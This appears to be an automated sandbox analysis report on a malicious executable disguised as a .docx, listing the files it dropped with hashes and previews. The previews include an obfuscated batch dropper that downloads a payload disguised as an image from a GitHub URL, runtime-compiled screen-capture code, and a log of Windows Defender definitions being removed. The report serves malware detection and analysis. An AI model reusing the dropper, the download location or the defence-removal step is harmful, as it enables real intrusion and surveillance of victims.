                                                                                                                                                                                                                                      SHA-256:56640503ABED889CD82BD19239EF77A44B2580FB4702DAEE74349BD55101C62C
                                                                                                                                                                                                                                      SHA-512:BA88FEBEE0ED5F7783FD6F95829793E0F5C7714FA50C3AD7587D1E1F848B494C132D67D3C11751104324A2EF47E11DE370B62F370BDE77D3ED48FC40AC8A3331
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x296fc99a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                                                                      Entropy (8bit):0.42217932375075845
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                                                                                                                                                                                                                      MD5:12F6093515D0F2C96757837E3506BBED
                                                                                                                                                                                                                                      SHA1:94445289B5C1E46D98A9F364D204CA88DACD71D9
                                                                                                                                                                                                                                      SHA-256:3F23FBC809559913F405B8479D17006660D97901138BA063643CEEE15C6083EE
                                                                                                                                                                                                                                      SHA-512:B2F5323DF5DF70E4327FE132AE7AC22BC4A498236BE2D7D90B0293F2FE843A872910377C0D3E3909813574EB150682741D261B2C2BCED2603424E90A303D9944
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:)o.... .......A.......X\...;...{......................0.!..........{A.+$...|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.....................................I+$...|......................+$...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                                                                      Entropy (8bit):0.07727674232503987
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Rum//EYe5WpZ90hajn13a/PZ3g3m/lllollcVO/lnlZMxZNQl:IW/Ez5WpZOha53qPumtAOewk
                                                                                                                                                                                                                                      MD5:C721FE4F9144BF210391E2AC51317D2E
                                                                                                                                                                                                                                      SHA1:05511C4C2435A8D7D49C025620D24F4D9B82ADF2
                                                                                                                                                                                                                                      SHA-256:8461E6484E733E6247481933B3C2CE88C429DDC12280A19EE7714D1A5E324D3A
                                                                                                                                                                                                                                      SHA-512:A75EA3ABCEE08097BCB6E6B22A5A30B9A1BC50F0A122C4452E63297335D54B64A4DA9348961961A26CE97532218C524B3E7BB62F0DD4C741E1C901D568422829
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:.TX......................................;...{..+$...|.......{A..............{A......{A..........{A]....................+$...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9434
                                                                                                                                                                                                                                      Entropy (8bit):4.928515784730612
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                                                                                                                                      MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                                                                                                                                      SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                                                                                                                                      SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                                                                                                                                      SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:@...e...........................................................
                                                                                                                                                                                                                                      Process:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8192
                                                                                                                                                                                                                                      Entropy (8bit):0.729480972450828
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1E44WxsvnOClDuUbwB7cKRSh/+wB77IoadnW/6ZPo:TJxMOW87yb7I
                                                                                                                                                                                                                                      MD5:F8683ADC6735282FAED16AEB36094838
                                                                                                                                                                                                                                      SHA1:0BDFCE41AB6782F2F08EA0DD42F1E9155BF53F96
                                                                                                                                                                                                                                      SHA-256:0DCB447D775D19AA301C04A00F696F28214392424629B7083227F9AF3A56B786
                                                                                                                                                                                                                                      SHA-512:4E47C880825E45B31910D2B6307F3011F97F44965559CA5D4879B01E3C37F5422344DC2C1705C0811C1B780FD7F634B1DCE99C615E7F804B8B2F133A9C0A7729
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:regf........b.Q.7.................. ...........y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm..k.DG..............................................................................................................................................................................................................................................................................................................................................Q\.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8192
                                                                                                                                                                                                                                      Entropy (8bit):0.7655891117783291
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:6e44Wxs9Y7nOClDuUbwB7cKRSh/+wB77IoadnW/6ZPo:IJxfjOW87yb7I
                                                                                                                                                                                                                                      MD5:E9778DD00FCFA6F9817631932902451E
                                                                                                                                                                                                                                      SHA1:12DDABEF6F50776423B361DE7160203889B5E3FC
                                                                                                                                                                                                                                      SHA-256:DA44C445FE892C28C50EAB9442FBAB3CB95FF1F37A7EC887029AA5900337982B
                                                                                                                                                                                                                                      SHA-512:35529A6B8F55A1E7E785C590A1302EED2D8C51231E5B99C318FB9941C5E90B731D8073348492BDE31857D6218F790CFC9C868CDEFDF270BFE0194ED47682349C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:regf........b.Q.7.................. ...........y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm..k.DG..............................................................................................................................................................................................................................................................................................................................................V\.7HvLE....................T....>.i.i.i............hbin................b.Q.7..........nk,.T...7..................................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............vk......0...........VeryFirstLaunch......7ri.DG.................vk................y Mode....p...sk..x...x.......t.......H...X.............4.........?.......................
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe
                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with very long lines (980), with CRLF, LF, NEL line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2636
                                                                                                                                                                                                                                      Entropy (8bit):4.259545646983714
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:40DYNjj78/lq5ilD33vwojjSPm5liobH3BX12LyvUt:4Uojv8/lPwoj0KBX12LyvO
                                                                                                                                                                                                                                      MD5:4C30B3F2F6E2670F27B4BE93E5B1A2AD
                                                                                                                                                                                                                                      SHA1:161C5C33915619EF490CB8270A373BC714AC51E7
                                                                                                                                                                                                                                      SHA-256:F1ACC66501F9392E887B25117664F69EBA557C8383764CEB743432F085E1D14C
                                                                                                                                                                                                                                      SHA-512:89B27C81A7E577115FE8D958F44F64893BC49AB9506E6F841AA5E4E1A7182D762F3DE6622AE6D4518E3C11D44CCEC325373AFCBFFDFF2F900CA35D38A2511297
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:@shift /0....&@cls&@set "....=vyqGKXL5F8RHnMrUouZV4@BCADpegiOWNxQzbPd9 jcw703as1lm6fhIkS2EYtTJ"..%....:~42,1%%....:~38,1%%....:~40,1%%TEMP%....%....:~26,1%%....:~16,1%%....:~43,1%%....:~27,1%%....:~14,1%%....:~48,1%%....:~54,1%%....:~27,1%%....:~50,1%%....:~50,1%%....:~40,1%-%....:~31,1%%....:~29,1%%....:~12,1%%....:~38,1%%....:~16,1%%....:~43,1%%....:~57,1%%....:~61,1%%....:~1,1%%....:~50,1%%....:~27,1%%....:~40,1%%l..x..%%....:~11,1%%....:~29,1%%....:~38,1%%....:~38,1%%....:~27,1%%....:~12,1%%....:~40,1%-%....:~23,1%%....:~16,1%%..V.I.%%....:~51,1%%....:~51,1%%....:~47,1%%....:~12,1%%....:~38,1%%....:~40,1%"%....:~55,1%%....:~12,1%%.a.f...%%....:~0,1%%....:~16,1%%....:~56,1%%....:~27,1%-%....:~31,1%%....:~27,1%%....:~36,1%%....:~10,1%%....:~27,1%%....:~2,1%%....:~17,1%%....:~27,1%%....:~48,1%%....:~61,1%%....:~40,1%'%....:~54,1%%....:~61,1%%....:~61,1%%....:~26,1%%....:~48,1%://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/'%....:~40,1%-%....:~16,1%%F
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1004
                                                                                                                                                                                                                                      Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                      MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                      SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                      SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                      SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):607
                                                                                                                                                                                                                                      Entropy (8bit):5.350246934047182
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfN/CWZEifN/H:V3ka6KOkqeFkOfNrEifNv
                                                                                                                                                                                                                                      MD5:D8204B138C4BAC576E900B56D8062FE7
                                                                                                                                                                                                                                      SHA1:B34AE2411C2E328AF68CB52D4184107C102BE27D
                                                                                                                                                                                                                                      SHA-256:53F5920F3AD63A4CD82D0169EFC7ACA75571EB2A694518309671B53657E7F341
                                                                                                                                                                                                                                      SHA-512:A9F2D138F7C454BE3ADDE03D04E15FF187986E485483D86144CCDE2EBDB8B6E49F950AD6E0F898773C5886CFEC0C9A328122CFE042DE6AA9DC3F400D8709018A
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.0.cs"
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4096
                                                                                                                                                                                                                                      Entropy (8bit):3.1602919862711967
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:6O7oEAtf0KhzBU/Gf6mtJ75N0Wz+pW1ul6a3+q:6Nz05mz5OWz0MK
                                                                                                                                                                                                                                      MD5:145F0C214FA74A055A8B056D642293DA
                                                                                                                                                                                                                                      SHA1:DF658CF4562017EA07E77DF9E71DEFD275D8E2C3
                                                                                                                                                                                                                                      SHA-256:05770DDA8D7D856D13588D04F444D7086858716F005C739A39EB3C8FFFA5D145
                                                                                                                                                                                                                                      SHA-512:5B18FE17F38DB69BFB1113901A125E044622A36983F956E796CCA9BFB73C034C048B388C7FFCB83D4FF421C526AD78A8C07EE52F71DB9B22867C44054A064950
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.Rg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                      Size (bytes):1149
                                                                                                                                                                                                                                      Entropy (8bit):5.518013944375424
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:KJfrxId3ka6KOkqeFkOfNrEifNWKax5DqBVKVrdFAMBJTH:uFkka6NkqeFkyNrEuNWK2DcVKdBJj
                                                                                                                                                                                                                                      MD5:4950C8B2BCF60D52AEF4D70DF987EFDE
                                                                                                                                                                                                                                      SHA1:8668F034748FAEBE2D44EB41A787C51BA540E98F
                                                                                                                                                                                                                                      SHA-256:467B25A63DC9B10E842C822B3752A1966DEB3F275B900C37CDE9B7D636C9ADE5
                                                                                                                                                                                                                                      SHA-512:2F99140537C73C1718DAE3B0E6185B51CCC7497C178F5D85BFCEBD0AC4C81D7A0FD1C04B615275D406884DA5FD20407B1841543CC4EF5FD55E547ACB90943102
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                                                                                      Entropy (8bit):3.106013622458142
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryUlak7Ynqq/KPN5Dlq5J:+RI+ycuZhNOlakS/KPNnqX
                                                                                                                                                                                                                                      MD5:92B377F638DF97BD21D080B748C3D07E
                                                                                                                                                                                                                                      SHA1:69E040E28E2C19E4475385ECDB21AEAAAF6DD18F
                                                                                                                                                                                                                                      SHA-256:28B75BD8AE4CB4CE2432E5A1AECF338FF016B17B7D20E8974C0939F583ADFB90
                                                                                                                                                                                                                                      SHA-512:782B98E25B7DC9520EF7C876ABA66E6E204E7B13D61DBD2DFBEB71A3BB6939CBEE7C4CB446D4BDC6B49A8EAB7668E26503B78957A535B0179DFBC020428C8B12
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.z.1.1.l.1.t.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.z.1.1.l.1.t.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):401989
                                                                                                                                                                                                                                      Entropy (8bit):7.945553079777195
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:oONqoBQKBZDhHOy9pdbv0a4biMirYHVMfk:HNBQKJOWpdbvx8258
                                                                                                                                                                                                                                      MD5:6BBE2B79BEF61A8EF3B21F694359531C
                                                                                                                                                                                                                                      SHA1:4CA37D47990FFFDCE53B237E183BCF953F33A582
                                                                                                                                                                                                                                      SHA-256:C329879F5A13224E4A974C97CE8D1509235490DE934FFDFAD4BE8B232BDA81FA
                                                                                                                                                                                                                                      SHA-512:F5CECD3F87FDDBDCDB5407EB397A554E9531A1BEC8793A5B0E14F2573C6D9CAC2C4C9D01561C9EB8D21C54839AA5B9BEF42A191A388C483D71E54754CF9D4402
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w...y..^..(6c..YE....%).H.6..i.,.$.-...6.i.H.'.,..{..Q..P.T..M..{#.R.L...no.=.....{.<..M.L..........Df...|.R...P...P..PY..PY.Y.Py.g....o....'7O...3..t....8.1...D....m%F..$..9-o3..:......4.......1q.....g....|7To.A....P.....zW.._F~......?......@*w..}P.K..'..q....8.;..9..........uSM.._.E.S../..&I...=:.j7.lz...SJ..?.....O.......................1...A..q.>.m..8...r..........6.k..P../.._D...0....^cj..~]A..c}...q.......~!.r.}o....+a.8..>....\.....`..}!................^..P..s.z.gC..S.....{.u*...6.}#..>.1mR...../.+....(..<.._K........W|64...\.<.].Z.z..k...W.yc..%.."..<.{..z.+)._...W..K_..K.....W.k.r.K._......u#v,)u....:._...WR......./.s^|<A.h...X.Ql.(_...D..b.>q.../|9Q.G].8.....^.../.....~#.UW.k..6.. .k..K:xA.s~l[...T....o..P_........v.m.....:.|e.P]v4..,}!....h..4G3..`..P.#..O.CJyN...~.x-....}]..uY.oE..U.k..jK.....s....>..ql.....3..([...Q;s.e.
                                                                                                                                                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                      Size (bytes):894
                                                                                                                                                                                                                                      Entropy (8bit):3.11947640459453
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:Q58KRBubdpkoPAGdjrB+5k9+MlWlLehW51IC4+I:QOaqdmOFdjr4e+kWResLIAI
                                                                                                                                                                                                                                      MD5:8A8CC56A980E6B8871366536FAD4430E
                                                                                                                                                                                                                                      SHA1:62A90BEBE168D3C90AC2BBBE8BA0A277165435A8
                                                                                                                                                                                                                                      SHA-256:0A57BACB08D20A0FB608922253D6FDD63944616D8E856F3E83EF6785D59F2516
                                                                                                                                                                                                                                      SHA-512:1ADB340184D48274BBDEDADE9B2A5C29E50DD8E6A90C3B7247A75E922EFEE7F726C8D237E482215C0C95E452ED942B768969A6B0F961A5FC711D44B0957C508B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. D.e.c. .. 0.5. .. 2.0.2.4. .1.3.:.3.7.:.0.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. D.e.c. .. 0.5. .. 2.0.2.4. .1.3.:.3.7.:.0.0.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Thu Dec 5 19:55:28 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1372
                                                                                                                                                                                                                                      Entropy (8bit):4.128150637053972
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:HOFq9s+fNazEFUDfHYwKef/hNII+ycuZhNOlakS/KPNnqS+d:ugNazEFSHKCZu1ul6a3+qSe
                                                                                                                                                                                                                                      MD5:3E118F169D78BC8286830E918300A573
                                                                                                                                                                                                                                      SHA1:E76E27BDBBF5A5A772C4A1A2C257F6CD78D06458
                                                                                                                                                                                                                                      SHA-256:DAF65D57218B44EE97084B39E72AD085CF3D720BCE5AE97D33C37DC45800ED2B
                                                                                                                                                                                                                                      SHA-512:6D0003DD10AFA821DE048515499F5A2BAF4121DAB5498C245DF8856376F8B14CE988CB46E9137F9AFFC7DD2EF413FBAED6ACE9726443EF99065F1D256B8E6146
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
